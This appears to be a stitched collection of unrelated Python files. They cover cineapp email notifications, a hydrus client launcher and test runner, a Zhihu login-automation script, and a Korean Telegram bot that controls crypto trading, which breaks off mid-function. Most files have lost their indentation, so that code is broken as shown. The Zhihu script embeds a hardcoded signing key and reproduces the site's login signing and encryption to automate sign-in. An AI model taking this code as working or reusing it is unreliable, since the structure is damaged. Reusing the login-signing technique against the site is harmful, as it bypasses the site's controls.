emails.py
# -*- coding: utf-8 -*-
from builtins import str
from flask import render_template,g
from flask_mail import Message
from cineapp import mail, db
from cineapp.models import User
from threading import Thread
from cineapp import app
import html2text, time, json, traceback
# Send mail in a dedicated thread so that the web app does not have to wait for delivery
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
# Wrapper function for sending mails using flask-mail plugin
def send_email(subject, sender, recipients, text_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
# Function which sends notifications to users when a show is added
def add_show_notification(show):
users = User.query.all()
for cur_user in users:
# Check if the cur_user is the logged user who added the show
# in order to change the mail text
send_own_activity_mail=True
if cur_user.id==g.user.id:
you_user=True
# Check if we must send an email for user own activity
if cur_user.notifications != None and cur_user.notifications["notif_own_activity"] == False:
send_own_activity_mail=False
else:
you_user=False
# Send the mail if we have to
if cur_user.notifications != None and cur_user.notifications["notif_show_add"] == True and send_own_activity_mail==True:
try:
send_email('[Cineapp] - %s' % g.messages["email_title_add"] , app.config['MAIL_SENDER'],[ cur_user.email ] ,
render_template('add_show_notification.txt', dest_user=cur_user, add_user=g.user,show=show,you_user=you_user))
except Exception as e:
app.logger.error("Impossible d'envoyer le mail d'ajout: %s",e)
return 1
# Function which sends notifications to users when a mark is added or updated for a show
def mark_show_notification(mark,notif_type):
users = User.query.filter_by().all()
# Convert the HTML content to text in order to have a nice display in the mail
html_converter = html2text.HTML2Text()
mark.comment=html_converter.handle(mark.comment).strip()
for cur_user in users:
# Check if the cur_user is the logged user who added the show
# in order to change the mail text
send_own_activity_mail=True
if cur_user.id==g.user.id:
you_user=True
# Check if we must send an email for user own activity
if cur_user.notifications != None and cur_user.notifications["notif_own_activity"] == False:
send_own_activity_mail=False
else:
you_user=False
# Send the mail if we have to
if cur_user.notifications != None and cur_user.notifications["notif_show_add"] == True and send_own_activity_mail==True:
try:
if notif_type == "add":
send_email('[Cineapp] - %s' % g.messages["email_title_mark"] , app.config['MAIL_SENDER'],[ cur_user.email ] ,
render_template('mark_show_notification.txt', dest_user=cur_user, add_user=g.user,mark=mark,you_user=you_user,notif_type=notif_type))
elif notif_type == "update":
send_email('[Cineapp] - Note mise à jour' , app.config['MAIL_SENDER'],[ cur_user.email ] ,
render_template('mark_show_notification.txt', dest_user=cur_user, add_user=g.user,mark=mark,you_user=you_user,notif_type=notif_type))
elif notif_type == "homework":
send_email('[Cineapp] - Devoir rempli' , app.config['MAIL_SENDER'],[ cur_user.email ] ,
render_template('mark_show_notification.txt', dest_user=cur_user, add_user=g.user,mark=mark,you_user=you_user,notif_type=notif_type))
return 0
except Exception as e:
app.logger.error("Impossible d'envoyer le mail: %s",e)
return 1
# Everything has been done correctly ==> return 0
return 0
# Function which sends a notification to the user who received a homework.
# For a homework, just send a mail to the user who has to handle it.
def add_homework_notification(mark):
# Check if notifications are enabled for the destination user
if mark.user.notifications != None and mark.user.notifications["notif_homework_add"] == True:
try:
send_email('[Cineapp] - Attribution d\'un devoir', app.config['MAIL_SENDER'],[ mark.user.email ],
render_template('add_homework_notification.txt', dest_user=mark.user, homework_who=mark.homework_who_user, show=mark.show))
return 0
except Exception as e:
# We couldn't send the mail
app.logger.error("Impossible d\'envoyer la notification de devoir : %s", e)
app.logger.error("%s" % traceback.print_exc())
return 1
else:
# Display a message that the user doesn't want to be notified
return 2
# Function which sends notifications when a homework has been cancelled
# Send a notification to the user who cancelled the homework and another to
# the destination user the homework was for
def delete_homework_notification(mark):
# Check if notifications are enabled for the user
if mark.user.notifications != None and mark.user.notifications["notif_homework_add"] == True:
try:
send_email('[Cineapp] - Annulation d\'un devoir', app.config['MAIL_SENDER'],[ mark.user.email ],
render_template('_homework_notification.txt', dest_user=mark.user, homework_who=mark.homework_who_user, show=mark.show))
return 0
except:
# We couldn't send the mail
return 1
else:
# Display a message that the user doesn't want to be notified
return 2
# Function which sends notifications to users when a show has been updated in the database
def update_show_notification(notif):
users = User.query.filter_by().all()
for cur_user in users:
# Check if the cur_user is the logged user who added the show
# in order to change the mail text
send_own_activity_mail=True
if cur_user.id==g.user.id:
you_user=True
# Check if we must send an email for user own activity
if cur_user.notifications != None and cur_user.notifications["notif_own_activity"] == False:
send_own_activity_mail=False
else:
you_user=False
# Send the mail if we have to
if cur_user.notifications != None and cur_user.notifications["notif_show_add"] == True and send_own_activity_mail==True:
send_email('[Cineapp] - %s' % g.messages["email_title_update"] , app.config['MAIL_SENDER'],[ cur_user.email ] ,
render_template('update_show_notification.txt', dest_user=cur_user, add_user=g.user,notif=notif,you_user=you_user))
# Function which sends notification to user when a comment has been posted on a mark
def mark_comment_notification(mark_comment,notif_type):
users = User.query.filter_by().all()
# Check if the comment is posted by a user on his own mark
if mark_comment.user.id==mark_comment.mark.user.id:
own_mark_user=True
else:
own_mark_user=False
for cur_user in users:
send_own_activity_mail=True
# Check if the logged user posted the comment
if cur_user.id==g.user.id:
you_user=True
# Check if we must send an email for user own activity
if cur_user.notifications != None and "notif_own_activity" in cur_user.notifications and cur_user.notifications["notif_own_activity"] == False:
send_own_activity_mail=False
else:
you_user=False
# Check if the comment refers to a mark for the logged user
if cur_user.id==mark_comment.mark.user.id:
you_dest_user=True
else:
you_dest_user=False
# Send the mail if we have to
if cur_user.notifications != None and "notif_comment_add" in cur_user.notifications and cur_user.notifications["notif_comment_add"] == True and send_own_activity_mail==True:
# Check the kind of mail we must send considering the notification type
if notif_type == "add_mark_comment":
mail_title = "Ajout d\'un commentaire"
notif_template = "mark_comment_notification.txt"
elif notif_type == "edit_mark_comment":
mail_title = "Modification d\'un commentaire"
notif_template = "mark_update_comment_notification.txt"
elif notif_type == "delete_mark_comment":
mail_title = "Suppression d\'un commentaire"
notif_template = "mark_delete_comment_notification.txt"
send_email('[Cineapp] - ' + mail_title , app.config['MAIL_SENDER'],[ cur_user.email ] ,
render_template(notif_template, dest_user=cur_user, mark_comment=mark_comment, you_user=you_user,you_dest_user=you_dest_user,own_mark_user=own_mark_user))
# Function which sends notification to user when the favorite/star status has been updated for a show
def favorite_update_notification(favorite_show,notif_type):
users = User.query.filter_by().all()
for cur_user in users:
send_own_activity_mail=True
# Check if the logged user posted the comment
if cur_user.id==g.user.id:
you_user=True
# Check if we must send an email for user own activity
if cur_user.notifications != None and "notif_own_activity" in cur_user.notifications and cur_user.notifications["notif_own_activity"] == False:
send_own_activity_mail=False
else:
you_user=False
# Send the mail if we have to
if cur_user.notifications != None and "notif_favorite_update" in cur_user.notifications and cur_user.notifications["notif_favorite_update"] == True and send_own_activity_mail==True:
# Check the kind of mail we must send considering the notification type
if notif_type == "add":
mail_title = g.messages["email_title_favorite_add"]
notif_template = "favorite_update_notification.txt"
elif notif_type == "delete":
mail_title = g.messages["email_title_favorite_delete"]
notif_template = "favorite_update_notification.txt"
send_email('[Cineapp] - ' + mail_title , app.config['MAIL_SENDER'],[ cur_user.email ] ,
render_template(notif_template, dest_user=cur_user, favorite_show=favorite_show, you_user=you_user, notif_type=notif_type))
# Function that sends a notification when a user is mentioned in the chat
def chat_message_notification(message,user):
if user.notifications != None and "notif_chat_message" in user.notifications and user.notifications["notif_chat_message"] == True:
app.logger.info("Sending mail for chat quote to %s " % user.email)
send_email('[Cineapp] - Message depuis le chat' , app.config['MAIL_SENDER'],[ user.email ] ,
render_template('chat_message_notification.txt', dest_user=user, message=message))
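A minimal sketch of the fire-and-forget threading pattern that send_email relies on above, using only the standard library and a hypothetical deliver() stand-in instead of Flask-Mail (all names here are illustrative, not part of cineapp):

import threading

def deliver(recipient, subject, body):
    # Stand-in for mail.send(); swap in a real mailer in practice.
    print(f"to={recipient} subject={subject}\n{body}")

def send_email_async(recipient, subject, body):
    # Hand delivery off to a background thread so the web request returns immediately.
    thr = threading.Thread(target=deliver, args=(recipient, subject, body), daemon=True)
    thr.start()
    return thr

if __name__ == "__main__":
    t = send_email_async("user@example.com", "[Cineapp] - test", "Hello")
    t.join()  # joined only so this demo exits after delivery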
client.py
#!/usr/bin/env python3
# This program is free software. It comes without any warranty, to
# the extent permitted by applicable law. You can redistribute it
# and/or modify it under the terms of the Do What The Fuck You Want
# To Public License, Version 2, as published by Sam Hocevar. See
# http://sam.zoy.org/wtfpl/COPYING for more details.
# import logging
# logging.basicConfig(filename="/mnt/storage2/logging.log", level=logging.DEBUG)
try:
from include import HydrusPy2To3
import wx
HydrusPy2To3.do_2to3_test( wx_error_display_callable = wx.SafeShowMessage )
from include import HydrusExceptions
from include import HydrusConstants as HC
from include import HydrusData
from include import HydrusPaths
import os
import sys
import time
from include import ClientController
import threading
from include import HydrusGlobals as HG
from include import HydrusLogger
import traceback
import faulthandler
faulthandler.enable()
try:
from twisted.internet import reactor
except:
HG.twisted_is_broke = True
#
import argparse
argparser = argparse.ArgumentParser( description = 'hydrus network client (console)' )
argparser.add_argument( '-d', '--db_dir', help = 'set an external db location' )
argparser.add_argument( '--no_daemons', action='store_true', help = 'run without background daemons' )
argparser.add_argument( '--no_wal', action='store_true', help = 'run without WAL db journalling' )
argparser.add_argument( '--no_db_temp_files', action='store_true', help = 'run the db entirely in memory' )
argparser.add_argument( '--temp_dir', help = 'override the program\'s temporary directory' )
result = argparser.parse_args()
if result.db_dir is None:
db_dir = HC.DEFAULT_DB_DIR
if not HydrusPaths.DirectoryIsWritable( db_dir ) or HC.RUNNING_FROM_OSX_APP:
db_dir = HC.USERPATH_DB_DIR
else:
db_dir = result.db_dir
db_dir = HydrusPaths.ConvertPortablePathToAbsPath( db_dir, HC.BASE_DIR )
try:
HydrusPaths.MakeSureDirectoryExists( db_dir )
except:
raise Exception( 'Could not ensure db path "{}" exists! Check the location is correct and that you have permission to write to it!'.format( db_dir ) )
if not os.path.isdir( db_dir ):
raise Exception( 'The given db path "{}" is not a directory!'.format( db_dir ) )
if not HydrusPaths.DirectoryIsWritable( db_dir ):
raise Exception( 'The given db path "{}" is not writable!'.format( db_dir ) )
HG.no_daemons = result.no_daemons
HG.no_wal = result.no_wal
HG.no_db_temp_files = result.no_db_temp_files
if result.temp_dir is not None:
HydrusPaths.SetEnvTempDir( result.temp_dir )
except Exception as e:
import traceback
import os
error_trace = traceback.format_exc()
print( error_trace )
wx.SafeShowMessage( 'critical boot error!', 'Critical boot error occurred! Details written to crash.log!' + os.linesep * 2 + str( e ) )
if 'db_dir' in locals() and os.path.exists( db_dir ):
dest_path = os.path.join( db_dir, 'crash.log' )
with open( dest_path, 'w', encoding = 'utf-8' ) as f:
f.write( error_trace )
print( 'Critical boot error occurred! Details written to crash.log!' )
sys.exit( 1 )
with HydrusLogger.HydrusLogger( db_dir, 'client' ) as logger:
try:
HydrusData.Print( 'hydrus client started' )
if not HG.twisted_is_broke:
threading.Thread( target = reactor.run, name = 'twisted', kwargs = { 'installSignalHandlers' : 0 } ).start()
controller = ClientController.Controller( db_dir )
controller.Run()
except:
HydrusData.Print( 'hydrus client failed' )
HydrusData.Print( traceback.format_exc() )
try:
message = 'The client failed to start. The error follows (it has also been written to the log in the db directory). If it is not obvious, please inform hydrus dev.'
message += os.linesep * 2
message += traceback.format_exc()
wx.SafeShowMessage( 'hydrus client failed', message )
except:
pass
finally:
HG.view_shutdown = True
HG.model_shutdown = True
try:
controller.pubimmediate( 'wake_daemons' )
except:
HydrusData.Print( traceback.format_exc() )
reactor.callFromThread( reactor.stop )
HydrusData.Print( 'hydrus client shut down' )
HG.shutdown_complete = True
if HG.restart:
HydrusData.RestartProcess()
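A rough, hedged sketch of the db_dir fallback logic above (explicit CLI path, else the default location, else a per-user path when the default is not writable), using only the standard library; DirectoryIsWritable is approximated with os.access and the directory constants are placeholders:

import os

DEFAULT_DB_DIR = os.path.join(os.getcwd(), "db")      # placeholder for HC.DEFAULT_DB_DIR
USERPATH_DB_DIR = os.path.expanduser("~/hydrus_db")   # placeholder for HC.USERPATH_DB_DIR

def resolve_db_dir(cli_db_dir=None):
    # Explicit CLI path wins; otherwise prefer the default location and fall back
    # to the per-user path when the default is missing or not writable.
    if cli_db_dir is not None:
        db_dir = cli_db_dir
    else:
        db_dir = DEFAULT_DB_DIR
        if not os.path.isdir(db_dir) or not os.access(db_dir, os.W_OK):
            db_dir = USERPATH_DB_DIR
    os.makedirs(db_dir, exist_ok=True)
    if not os.access(db_dir, os.W_OK):
        raise Exception(f'The given db path "{db_dir}" is not writable!')
    return db_dir

print(resolve_db_dir())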
zhihu_login.py
# -*- coding: utf-8 -*-
import threading
__author__ = 'zkqiang'
__zhihu__ = 'https://www.zhihu.com/people/z-kqiang'
__github__ = 'https://github.com/zkqiang/Zhihu-Login'
import base64
import hashlib
import hmac
import json
import re
import time
from http import cookiejar
from urllib.parse import urlencode
import execjs
import requests
from PIL import Image
class ZhihuAccount(object):
def __init__(self, username: str = None, password: str = None):
self.username = username
self.password = password
self.login_data = {
'client_id': 'c3cef7c66a1843f8b3a9e6a1e3160e20',
'grant_type': 'password',
'source': 'com.zhihu.web',
'username': '',
'password': '',
'lang': 'en',
'ref_source': 'homepage',
'utm_source': ''
}
self.session = requests.session()
self.session.headers = {
'accept-encoding': 'gzip, deflate, br',
'Host': 'www.zhihu.com',
'Referer': 'https://www.zhihu.com/',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
'(KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36'
}
self.session.cookies = cookiejar.LWPCookieJar(filename='./cookies.txt')
def login(self, captcha_lang: str = 'en', load_cookies: bool = True):
"""
Log in to Zhihu by simulating the browser flow.
:param captcha_lang: captcha type, 'en' or 'cn'
:param load_cookies: whether to load the cookies saved last time
:return: bool
If the Chinese captcha cannot be clicked when running under PyCharm, uncheck
Settings / Tools / Python Scientific / Show Plots in Toolwindow.
"""
if load_cookies and self.load_cookies():
print('读取 Cookies 文件')
if self.check_login():
print('登录成功')
return True
print('Cookies 已过期')
self._check_user_pass()
self.login_data.update({
'username': self.username,
'password': self.password,
'lang': captcha_lang
})
timestamp = int(time.time() * 1000)
self.login_data.update({
'captcha': self._get_captcha(self.login_data['lang']),
'timestamp': timestamp,
'signature': self._get_signature(timestamp)
})
headers = self.session.headers.copy()
headers.update({
'content-type': 'application/x-www-form-urlencoded',
'x-zse-83': '3_1.1',
'x-xsrftoken': self._get_xsrf()
})
data = self._encrypt(self.login_data)
login_api = 'https://www.zhihu.com/api/v3/oauth/sign_in'
resp = self.session.post(login_api, data=data, headers=headers)
if 'error' in resp.text:
print(json.loads(resp.text)['error'])
if self.check_login():
print('登录成功')
return True
print('登录失败')
return False
def load_cookies(self):
"""
Load the cookies file into the session.
:return: bool
"""
try:
self.session.cookies.load(ignore_discard=True)
return True
except FileNotFoundError:
return False
def check_login(self):
"""
Check the login state: if visiting the signup page triggers a redirect, we are already logged in.
Save the current cookies if logged in.
:return: bool
"""
login_url = 'https://www.zhihu.com/signup'
resp = self.session.get(login_url, allow_redirects=False)
if resp.status_code == 302:
self.session.cookies.save()
return True
return False
def _get_xsrf(self):
"""
Fetch the xsrf token from the login page.
:return: str
"""
self.session.get('https://www.zhihu.com/', allow_redirects=False)
for c in self.session.cookies:
if c.name == '_xsrf':
return c.value
raise AssertionError('获取 xsrf 失败')
def _get_captcha(self, lang: str):
"""
Call the captcha API; it must be requested once whether or not a captcha is needed.
If a captcha is required, the API returns the image as base64.
The captcha type depends on lang and must be solved manually.
:param lang: language of the captcha (en/cn)
:return: the captcha value to POST
"""
if lang == 'cn':
api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=cn'
else:
api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=en'
resp = self.session.get(api)
show_captcha = re.search(r'true', resp.text)
if show_captcha:
put_resp = self.session.put(api)
json_data = json.loads(put_resp.text)
img_base64 = json_data['img_base64'].replace(r'\n', '')
with open('./captcha.jpg', 'wb') as f:
f.write(base64.b64decode(img_base64))
img = Image.open('./captcha.jpg')
if lang == 'cn':
import matplotlib.pyplot as plt
plt.imshow(img)
print('点击所有倒立的汉字,在命令行中按回车提交')
points = plt.ginput(7)
capt = json.dumps({'img_size': [200, 44],
'input_points': [[i[0] / 2, i[1] / 2] for i in points]})
else:
img_thread = threading.Thread(target=img.show, daemon=True)
img_thread.start()
capt = input('请输入图片里的验证码:')
# The captcha value must first be POSTed to the captcha API
self.session.post(api, data={'input_text': capt})
return capt
return ''
def _get_signature(self, timestamp: int or str):
"""
Compute the request signature with HMAC-SHA1;
it is a few fixed strings plus the timestamp.
:param timestamp: timestamp
:return: signature
"""
ha = hmac.new(b'd1b964811afb40118a12068ff74a12f4', digestmod=hashlib.sha1)
grant_type = self.login_data['grant_type']
client_id = self.login_data['client_id']
source = self.login_data['source']
ha.update(bytes((grant_type + client_id + source + str(timestamp)), 'utf-8'))
return ha.hexdigest()
def _check_user_pass(self):
"""
Check whether the username and password were provided; prompt for them if not.
"""
if not self.username:
self.username = input('请输入手机号:')
if self.username.isdigit() and '+86' not in self.username:
self.username = '+86' + self.username
if not self.password:
self.password = input('请输入密码:')
@staticmethod
def _encrypt(form_data: dict):
with open('./encrypt.js') as f:
js = execjs.compile(f.read())
return js.call('Q', urlencode(form_data))
if __name__ == '__main__':
account = ZhihuAccount('', '')
account.login(captcha_lang='en', load_cookies=True)
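The signature built in _get_signature is an HMAC-SHA1 over grant_type + client_id + source + timestamp with a fixed key; a self-contained sketch of the same calculation (sample values only):

import hashlib
import hmac
import time

def zhihu_signature(grant_type, client_id, source, timestamp):
    # HMAC-SHA1 over the concatenated fields, keyed with the fixed secret used above.
    ha = hmac.new(b'd1b964811afb40118a12068ff74a12f4', digestmod=hashlib.sha1)
    ha.update((grant_type + client_id + source + str(timestamp)).encode('utf-8'))
    return ha.hexdigest()

print(zhihu_signature('password', 'c3cef7c66a1843f8b3a9e6a1e3160e20',
                      'com.zhihu.web', int(time.time() * 1000)))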
test.py
#!/usr/bin/env python3

from hydrus import QtPorting as QP
from qtpy import QtWidgets as QW
from qtpy import QtCore as QC

import locale

try: locale.setlocale( locale.LC_ALL, '' )
except: pass

from hydrus import HydrusConstants as HC
from hydrus import HydrusData
from hydrus import HydrusGlobals as HG
from hydrus import TestController
import sys
import threading
import traceback

from twisted.internet import reactor

if __name__ == '__main__':

    args = sys.argv[1:]

    if len( args ) > 0:
        only_run = args[0]
    else:
        only_run = None

    try:
        threading.Thread( target = reactor.run, kwargs = { 'installSignalHandlers' : 0 } ).start()

        QP.MonkeyPatchMissingMethods()

        app = QW.QApplication( sys.argv )
        app.call_after_catcher = QP.CallAfterEventCatcher( app )

        try:
            # we run the tests on the Qt thread atm
            # keep a window alive the whole time so the app doesn't finish its mainloop
            win = QW.QWidget( None )
            win.setWindowTitle( 'Running tests...' )

            controller = TestController.Controller( win, only_run )

            def do_it():
                controller.Run( win )

            QP.CallAfter( do_it )

            app.exec_()
        except:
            HydrusData.DebugPrint( traceback.format_exc() )
        finally:
            HG.view_shutdown = True
            controller.pubimmediate( 'wake_daemons' )

            HG.model_shutdown = True
            controller.pubimmediate( 'wake_daemons' )

            controller.TidyUp()
    except:
        HydrusData.DebugPrint( traceback.format_exc() )
    finally:
        reactor.callFromThread( reactor.stop )

        print( 'This was version ' + str( HC.SOFTWARE_VERSION ) )

        input()
telegram_controller.py
"""텔래그램 챗봇을 활용한 시스템 운영 인터페이스
Operator를 사용해서 시스템을 컨트롤하는 모듈
"""
import os
import signal
import time
import threading
import json
from urllib import parse
import requests
from dotenv import load_dotenv
from . import (
LogManager,
Analyzer,
UpbitTrader,
UpbitDataProvider,
BithumbTrader,
BithumbDataProvider,
Worker,
StrategyBuyAndHold,
StrategySma0,
Operator,
)
load_dotenv()
class TelegramController:
"""smtm 탤래그램 챗봇 컨트롤러"""
API_HOST = "https://api.telegram.org/"
TEST_FILE = "data/telegram_chatbot.jpg"
TOKEN = os.environ.get("TELEGRAM_BOT_TOKEN", "telegram_token")
CHAT_ID = int(os.environ.get("TELEGRAM_CHAT_ID", "123456"))
POLLING_TIMEOUT = 10
INTERVAL = 60
GUIDE_READY = "자동 거래 시작 전입니다.\n명령어를 입력해주세요.\n\n"
GUIDE_RUNNING = "자동 거래 운영 중입니다.\n명령어를 입력해주세요.\n\n"
def __init__(self):
LogManager.set_stream_level(30)
self.logger = LogManager.get_logger("TelegramController")
self.post_worker = Worker("Chatbot-Post-Worker")
self.post_worker.start()
# chatbot variable
self.terminating = False
self.last_update_id = 0
self.in_progress = None
self.in_progress_step = 0
self.main_keyboard = None
self.setup_list = []
self.score_query_list = []
# smtm variable
self.operator = None
self.budget = None
self.strategy = None
self.data_provider = None
self.trader = None
self.command_list = []
self._create_command()
self.currency = None
def _create_command(self):
"""명령어 정보를 생성한다"""
self.command_list = [
{
"guide": "1. 시작 - 자동 거래 시작",
"cmd": ["시작", "1", "1. 시작"],
"action": self._start_trading,
},
{
"guide": "2. 중지 - 자동 거래 중지",
"cmd": ["중지", "2", "2. 중지"],
"action": self._stop_trading,
},
{
"guide": "3. 상태 조회 - 운영 상태 조회",
"cmd": ["상태", "3", "3. 상태 조회", "상태 조회"],
"action": self._query_state,
},
{
"guide": "4. 수익률 조회 - 기간별 수익률 조회",
"cmd": ["수익", "4", "수익률 조회", "4. 수익률 조회"],
"action": self._query_score,
},
{
"guide": "5. 거래내역 조회 - 모든 거래내역 조회",
"cmd": ["거래", "5", "거래내역 조회", "5. 거래내역 조회"],
"action": self._query_trading_records,
},
]
main_keyboard = {
"keyboard": [
[{"text": "1. 시작"}, {"text": "2. 중지"}],
[{"text": "3. 상태 조회"}, {"text": "4. 수익률 조회"}, {"text": "5. 거래내역 조회"}],
]
}
main_keyboard = json.dumps(main_keyboard)
self.main_keyboard = parse.quote(main_keyboard)
self.setup_list = [
{"guide": "운영 예산을 정해주세요", "keyboard": ["50000", "100000", "500000", "1000000"]},
{"guide": "거래할 화폐를 정해주세요", "keyboard": ["BTC", "ETH"]},
{"guide": "거래소를 선택해 주세요", "keyboard": ["1. Upbit", "2. Bithumb"]},
{"guide": "전략을 선택해 주세요", "keyboard": ["1. Buy and Hold", "2. Simple Moving Average"]},
{"guide": "자동 거래를 시작할까요?", "keyboard": ["1. Yes", "2. No"]},
]
self._convert_keyboard_markup(self.setup_list)
self.score_query_list = [
{
"guide": "조회할 기간을 정해주세요",
"keyboard": [
"1. 최근 6시간",
"2. 최근 12시간",
"3. 최근 24시간",
"4. 24시간 전부터 12시간",
"5. 48시간 전부터 24시간",
],
},
]
self._convert_keyboard_markup(self.score_query_list)
@staticmethod
def _convert_keyboard_markup(setup_list):
for item in setup_list:
markup = {"keyboard": []}
for key in item["keyboard"]:
markup["keyboard"].append([{"text": key}])
markup = json.dumps(markup)
item["keyboard"] = parse.quote(markup)
def main(self):
"""main 함수"""
print("##### smtm telegram controller is started #####")
signal.signal(signal.SIGINT, self._terminate)
signal.signal(signal.SIGTERM, self._terminate)
self._start_get_updates_loop()
while not self.terminating:
try:
time.sleep(0.5)
except EOFError:
break
def _start_get_updates_loop(self):
"""반복적 텔레그램 메세지를 확인하는 쓰레드 관리"""
def looper():
self.logger.debug(f"start get updates thread: {threading.get_ident()}")
while not self.terminating:
self._handle_message()
get_updates_thread = threading.Thread(target=looper, name="get updates", daemon=True)
get_updates_thread.start()
def _handle_message(self):
"""텔레그램 메세지를 확인해서 명령어를 처리"""
updates = self._get_updates()
try:
if updates is not None and updates["ok"]:
for result in updates["result"]:
self.logger.debug(f'result: {result["message"]["chat"]["id"]} : {self.CHAT_ID}')
if result["message"]["chat"]["id"] != self.CHAT_ID:
continue
if "text" in result["message"]:
self._execute_command(result["message"]["text"])
self.last_update_id = result["update_id"]
except (ValueError, KeyError):
self.logger.error("Invalid data from server")
def _execute_command(self, command):
self.logger.debug(f"_execute_command: {command}")
found = False
try:
if self.in_progress is not None:
self.in_progress(command)
return
except TypeError:
self.logger.debug("invalid in_progress")
for item in self.command_list:
if command in item["cmd"]:
found = True
item["action"](command)
if not found:
if self.operator is None:
message = self.GUIDE_READY
else:
message = self.GUIDE_RUNNING
for item in self.command_list:
message += item["guide"] + "\n"
self._send_text_message(message, self.main_keyboard)
def _send_text_message(self, text, keyboard=None):
encoded_text = parse.quote(text)
if keyboard is not None:
url = f"{self.API_HOST}{self.TOKEN}/sendMessage?chat_id={self.CHAT_ID}&text={encoded_text}&reply_markup={keyboard}"
else:
url = f"{self.API_HOST}{self.TOKEN}/sendMessage?chat_id={self.CHAT_ID}&text={encoded_text}"
def send_message(task):
self._send_http(task["url"])
self.post_worker.post_task({"runnable": send_message, "url": url})
def _send_image_message(self, file):
url = f"{self.API_HOST}{self.TOKEN}/sendPhoto?chat_id={self.CHAT_ID}"
def send_image(task):
self._send_http(task["url"], True, task["file"])
self.post_worker.post_task({"runnable": send_image, "url": url, "file": file})
def _get_updates(self):
"""getUpdates API로 새로운 메세지를 가져오기"""
offset = self.last_update_id + 1
return self._send_http(
f"{self.API_HOST}{self.TOKEN}/getUpdates?offset={offset}&timeout={self.POLLING_TIMEOUT}"
)
def _send_http(self, url, is_post=False, file=None):
try:
if is_post:
if file is not None:
with open(file, "rb") as image_file:
response = requests.post(url, files={"photo": image_file})
else:
response = requests.post(url)
else:
response = requests.get(url)
response.raise_for_status()
result = response.json()
except ValueError:
self.logger.error("Invalid data from server")
return None
except requests.exceptions.HTTPError as msg:
self.logger.error(msg)
return None
except requests.exceptions.RequestException as msg:
self.logger.error(msg)
return None
return result
def _start_trading(self, command):
"""초기화 후 자동 거래 시작"""
not_ok = True
message = ""
if self.in_progress_step == 0:
not_ok = False
elif self.in_progress_step == 1:
try:
self.budget = int(command)
not_ok = False
except ValueError:
self.logger.info(f"invalid budget {command}")
elif self.in_progress_step == 2:
if command.upper() == "BTC":
self.currency = "BTC"
not_ok = False
elif command.upper() == "ETH":
self.currency = "ETH"
not_ok = False
elif self.in_progress_step == 3:
if command.upper() in ["1. UPBIT", "1", "UPBIT"]:
self.data_provider = UpbitDataProvider(currency=self.currency)
self.trader = UpbitTrader(budget=self.budget, currency=self.currency)
not_ok = False
elif command.upper() in ["2. BITHUMB", "2", "BITHUMB"]:
self.data_provider = BithumbDataProvider(currency=self.currency)
self.trader = BithumbTrader(budget=self.budget, currency=self.currency)
not_ok = False
elif self.in_progress_step == 4:
if command.upper() in ["1. BUY AND HOLD", "1", "BUY AND HOLD", "BNH"]:
self.strategy = StrategyBuyAndHold()
not_ok = False
elif command.upper() in [
"2. SIMPLE MOVING AVERAGE",
"2",
"SIMPLE MOVING AVERAGE",
"SMA",
]:
self.strategy = StrategySma0()
not_ok = False
if not not_ok:
message = "".join(
[
f"화폐: {self.currency}\n",
f"전략: {self.strategy.NAME}\n",
f"거래소: {self.trader.NAME}\n",
f"예산: {self.budget}\n",
]
)
elif self.in_progress_step == len(self.setup_list) and command.upper() in [
"1. YES",
"1",
"Y",
"YES",
]:
self.operator = Operator()
self.operator.initialize(
self.data_provider,
self.strategy,
self.trader,
Analyzer(),
budget=self.budget,
)
self.operator.set_interval(self.INTERVAL)
if self.operator.start():
start_message = [
"자동 거래가 시작되었습니다!\n",
f"화폐: {self.currency}\n",
f"전략: {self.strategy.NAME}\n",
f"거래소: {self.trader.NAME}\n",
f"예산: {self.budget}\n",
f"거래 간격: {self.INTERVAL}",
]
self._send_text_message("".join(start_message), self.main_keyboard)
self.logger.info(
f"## START! strategy: {self.strategy.NAME} , trader: {self.trader.NAME}"
)
self.in_progress = None
self.in_progress_step = 0
return
if not_ok or self.in_progress_step >= len(self.setup_list):
self._terminate_start_in_progress()
return
message += self.setup_list[self.in_progress_step]["guide"]
keyboard = self.setup_list[self.in_progress_step]["keyboard"]
self._send_text_message(message, keyboard)
self.in_progress = self._start_trading
self.in_progress_step += 1
def _terminate_start_in_progress(self):
self.in_progress = None
self.in_progress_step = 0
self.operator = None
self.budget = None
self.strategy = None
self.data_provider = None
self.trader = None
self._send_text_message("자동 거래가 시작되지 않았습니다.\n처음부터 다시 시작해주세요", self.main_keyboard)
def _stop_trading(self, command):
"""자동 거래 중지"""
del command
if self.operator is not None:
self.operator.stop()
self.in_progress = None
self.in_progress_step = 0
self.operator = None
self.budget = None
self.strategy = None
self.data_provider = None
self.trader = None
self._send_text_message("자동 거래가 중지되었습니다", self.main_keyboard)
def _query_state(self, command):
"""현재 상태를 메세지로 전송"""
del command
if self.operator is None:
message = "자동 거래 시작 전입니다"
else:
message = "자동 거래 운영 중입니다"
self._send_text_message(message)
def _query_score(self, command):
"""구간 수익률과 그래프를 메세지로 전송
"1. 최근 6시간"
"2. 최근 12시간"
"3. 최근 24시간"
"4. 24시간 전부터 12시간"
"5. 48시간 전부터 24시간"
"""
query_list = {
"1. 최근 6시간": (60 * 6, -1),
"2. 최근 12시간": (60 * 12, -1),
"3. 최근 24시간": (60 * 24, -1),
"4. 24시간 전부터 12시간": (60 * 12, -2),
"5. 48시간 전부터 24시간": (60 * 24, -2),
"1": (60 * 6, -1),
"2": (60 * 12, -1),
"3": (60 * 24, -1),
"4": (60 * 12, -2),
"5": (60 * 24, -2),
}
not_ok = True
if self.operator is None:
self._send_text_message("자동 거래 운영중이 아닙니다", self.main_keyboard)
return
message = ""
if self.in_progress_step == 1:
if command in query_list.keys():
def print_score_and_main_statement(score):
if score is None:
self._send_text_message("수익률 조회중 문제가 발생하였습니다.", self.main_keyboard)
return
score_message = [
f"자산 {score[0]} -> {score[1]}\n",
f"누적수익률 {score[2]}\n",
f"비교수익률 {score[3]}\n",
]
self._send_text_message("".join(score_message), self.main_keyboard)
if len(score) > 4 and score[4] is not None:
self._send_image_message(score[4])
self.operator.get_score(print_score_and_main_statement, query_list[command])
not_ok = False
if self.in_progress_step >= len(self.score_query_list):
self.in_progress = None
self.in_progress_step = 0
if not_ok:
